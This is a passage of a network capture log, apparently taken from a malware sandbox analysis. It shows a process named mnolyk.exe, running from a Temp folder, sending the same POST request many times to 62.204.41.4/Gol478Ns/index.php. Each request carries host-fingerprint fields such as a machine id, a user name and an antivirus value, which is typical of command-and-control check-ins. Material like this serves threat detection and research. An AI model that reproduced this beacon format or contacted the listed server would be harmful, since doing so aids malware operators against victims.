Feb 7, 2023 19:59:48.802433014 CET	827	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:48.866039038 CET	827	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
583	192.168.2.5	50296	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:49.030441046 CET	828	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:49.096431017 CET	828	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
584	192.168.2.5	50297	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:49.266256094 CET	829	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:49.331087112 CET	829	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
585	192.168.2.5	50298	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:49.514228106 CET	830	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:49.582396030 CET	830	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
586	192.168.2.5	50299	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:49.758750916 CET	831	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:49.821659088 CET	831	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
587	192.168.2.5	50300	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:50.001267910 CET	832	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:50.066451073 CET	832	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
588	192.168.2.5	50301	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:50.234622955 CET	833	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:50.300815105 CET	833	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
589	192.168.2.5	50302	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:50.470972061 CET	834	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:50.535456896 CET	834	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.5	49764	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:20.603429079 CET	249	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:20.669308901 CET	249	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
590	192.168.2.5	50303	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:50.704498053 CET	835	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:50.767661095 CET	835	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
591	192.168.2.5	50304	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:50.968034029 CET	836	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:51.030764103 CET	836	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
592	192.168.2.5	50305	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:51.225445986 CET	837	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:51.290673971 CET	837	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
593	192.168.2.5	50306	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:51.473442078 CET	838	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:51.536433935 CET	838	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
594	192.168.2.5	50307	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:51.711604118 CET	839	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:51.775624037 CET	839	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
595	192.168.2.5	50308	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:51.952267885 CET	840	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:52.016221046 CET	840	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
596	192.168.2.5	50309	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:52.188472033 CET	841	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:52.253403902 CET	841	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
597	192.168.2.5	50310	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:52.435303926 CET	842	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:52.498862982 CET	842	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
598	192.168.2.5	50311	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:52.679367065 CET	843	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:52.746522903 CET	843	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
599	192.168.2.5	50312	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:52.924012899 CET	844	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:52.986862898 CET	844	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49703	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:06.000699997 CET	102	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:06.065315962 CET	102	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.5	49765	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:20.854176998 CET	250	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:20.918634892 CET	250	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
600	192.168.2.5	50313	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:53.159400940 CET	845	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:53.225836992 CET	845	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
